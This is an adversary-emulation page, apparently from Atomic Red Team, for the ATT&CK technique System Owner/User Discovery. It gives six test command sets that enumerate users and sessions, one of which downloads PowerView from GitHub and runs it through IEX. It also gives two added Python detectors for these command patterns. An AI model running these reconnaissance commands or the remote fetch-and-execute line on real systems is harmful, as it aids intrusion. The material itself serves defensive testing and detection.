
System Owner/User Discovery

Description from ATT&CK

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.

On network devices, Network Device CLI commands such as show users and show ssh can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)

Atomic Tests

Atomic Test #1 - System Owner/User Discovery

Identify System owner or users on an endpoint.

Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.

Supported Platforms: windows

auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | localhost |

Attack Commands: Run with command_prompt!

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
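
A detection-side counterpart to Atomic Test #1, added here as an example and not part of the Atomic Red Team project: it groups process-creation events by parent process and alerts only when several distinct user-discovery commands start within a short window, which is the shape of this test (and of automated discovery generally) rather than of a lone whoami from a help-desk script. The event field names (ts, host, ppid, cmdline) and the sample events are assumptions; map them from your Sysmon Event ID 1 or Security 4688 source.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command patterns for the discovery tools run by Atomic Test #1. The tool name must
# follow start-of-line, whitespace, a backslash or a quote, so "notwhoami.exe" is ignored.
DISCOVERY_PATTERNS = {
    "whoami": re.compile(r'(?:^|[\s\\"])whoami(?:\.exe)?\b', re.I),
    "quser": re.compile(r'(?:^|[\s\\"])quser(?:\.exe)?\b', re.I),
    "qwinsta": re.compile(r'(?:^|[\s\\"])qwinsta(?:\.exe)?\b', re.I),
    "wmic useraccount": re.compile(r'(?:^|[\s\\"])wmic(?:\.exe)?\s+useraccount\b', re.I),
}

def classify(cmdline):
    """Return the label of the first discovery pattern found in cmdline, else None."""
    for label, pattern in DISCOVERY_PATTERNS.items():
        if pattern.search(cmdline):
            return label
    return None

def find_bursts(events, window=timedelta(seconds=60), threshold=3):
    """Group process-creation events by (host, parent PID) and report groups in
    which at least `threshold` distinct discovery commands start within `window`.
    A single whoami stays below the threshold and produces no alert."""
    by_parent = defaultdict(list)
    for event in events:
        label = classify(event["cmdline"])
        if label:
            by_parent[(event["host"], event["ppid"])].append(
                (datetime.fromisoformat(event["ts"]), label))
    alerts = []
    for (host, ppid), hits in by_parent.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {label for ts, label in hits[i:] if ts - start <= window}
            if len(seen) >= threshold:
                alerts.append((host, ppid, sorted(seen)))
                break
    return alerts

# Constructed sample events (not real telemetry): the Test #1 chain under one cmd.exe
# parent on ws01, plus unrelated activity on ws02 that must not alert.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:00", "host": "ws01", "ppid": 4120, "cmdline": "cmd.exe /C whoami"},
    {"ts": "2024-01-01T10:00:01", "host": "ws01", "ppid": 4120, "cmdline": "wmic useraccount get /ALL"},
    {"ts": "2024-01-01T10:00:02", "host": "ws01", "ppid": 4120, "cmdline": 'quser /SERVER:"localhost"'},
    {"ts": "2024-01-01T10:00:03", "host": "ws01", "ppid": 4120, "cmdline": "qwinsta.exe /server:localhost"},
    {"ts": "2024-01-01T10:05:00", "host": "ws02", "ppid": 880, "cmdline": "whoami"},
    {"ts": "2024-01-01T10:05:30", "host": "ws02", "ppid": 880, "cmdline": "notepad.exe C:\\notes.txt"},
]
```

Running find_bursts(SAMPLE_EVENTS) yields one alert for ws01 listing all four commands; the threshold and window are the knobs to tune against your own baseline of admin tooling.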

Atomic Test #2 - System Owner/User Discovery

Identify System owner or users on an endpoint

Upon successful execution, sh will print a list of usernames to stdout.

Supported Platforms: freebsd,linux,macos

auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c

Inputs:

None

Attack Commands: Run with sh!

users
w
who

Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)

Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.

Supported Platforms: windows

auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca

Inputs:

None

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose

Atomic Test #4 - User Discovery With Env Vars PowerShell Script

Use the PowerShell environment variables to identify the current logged user.

Supported Platforms: windows

auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51

Inputs:

None

Attack Commands: Run with powershell!

[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append

Cleanup Commands:

Remove-Item -Path .\CurrentactiveUser.txt -Force

Atomic Test #5 - GetCurrent User with PowerShell Script

Use the static "GetCurrent" method of the .NET WindowsIdentity class from PowerShell to identify the logged-in user.

Supported Platforms: windows

auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b

Inputs:

None

Attack Commands: Run with powershell!

[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt

Cleanup Commands:

Remove-Item -Path .\CurrentUserObject.txt -Force

Atomic Test #6 - System Discovery - SocGholish whoami

SocGholish runs whoami discovery commands and writes the results to a .tmp file with a random name. The test generates a filename of the same shape as the one SocGholish creates during execution and writes the file to AppData\Temp.

Reference: https://redcanary.com/threat-detection-report/threats/socgholish/

Supported Platforms: windows

auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_path | Location of output file | string | $env:temp |

Attack Commands: Run with powershell!

$TokenSet = @{
  U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
  N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"

whoami.exe /all >> #{output_path}\$file

Cleanup Commands:

Remove-Item -Path #{output_path}\rad*.tmp -Force
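
The artifact this test leaves behind is more specific than the whoami command itself, so a detection can key on it. The following example is added here and is not part of the Atomic Red Team project: it recognises the rad?????.tmp filename shape produced by the generator above when the file is created under a Temp directory, and correlates it with a whoami /all process start. Because the >> redirection is performed by the shell, the file-creating process is whoami's parent, so the join is on whoami's parent PID. Event field names (host, pid, ppid, cmdline, path) and the sample events are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Filename shape produced by the generator in Atomic Test #6: "rad" + five characters
# drawn from uppercase letters and digits + ".tmp". Matched case-insensitively because
# many pipelines lowercase Windows paths before storing them.
RAD_TMP = re.compile(r"^rad[A-Z0-9]{5}\.tmp$", re.I)
WHOAMI_ALL = re.compile(r'(?:^|[\s\\"])whoami(?:\.exe)?"?\s+/all\b', re.I)

def is_rad_tmp(path):
    """True if the Windows path names a rad?????.tmp file inside a Temp directory."""
    parsed = PureWindowsPath(path)
    in_temp = any(part.lower() == "temp" for part in parsed.parts[:-1])
    return in_temp and RAD_TMP.match(parsed.name) is not None

def socgholish_whoami_alerts(proc_events, file_events):
    """Return (host, path) pairs where a rad*.tmp file was created in Temp by the
    parent shell of a `whoami /all` process on the same host. The shell (cmd.exe or
    powershell.exe) performs the '>>' write, so file_events carry the parent's PID."""
    shells = {(e["host"], e["ppid"]) for e in proc_events
              if WHOAMI_ALL.search(e["cmdline"])}
    return sorted((e["host"], e["path"]) for e in file_events
                  if (e["host"], e["pid"]) in shells and is_rad_tmp(e["path"]))

# Constructed sample telemetry (not real events): the test-style chain on ws01, a
# whoami /all on ws02 whose output goes to Documents rather than Temp, and an
# unrelated .tmp file written by the same shell on ws01.
PROC_EVENTS = [
    {"host": "ws01", "pid": 5120, "ppid": 4400, "cmdline": '"whoami.exe" /all'},
    {"host": "ws02", "pid": 612, "ppid": 600, "cmdline": "whoami /all"},
]
FILE_EVENTS = [
    {"host": "ws01", "pid": 4400, "path": r"C:\Users\alice\AppData\Local\Temp\radB7K2Q.tmp"},
    {"host": "ws01", "pid": 4400, "path": r"C:\Users\alice\AppData\Local\Temp\report.tmp"},
    {"host": "ws02", "pid": 600, "path": r"C:\Users\bob\Documents\radB7K2Q.tmp"},
]
```

socgholish_whoami_alerts(PROC_EVENTS, FILE_EVENTS) returns only the ws01 Temp file; the cleanup command's rad*.tmp glob is a second, file-deletion signal on the same artifact.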
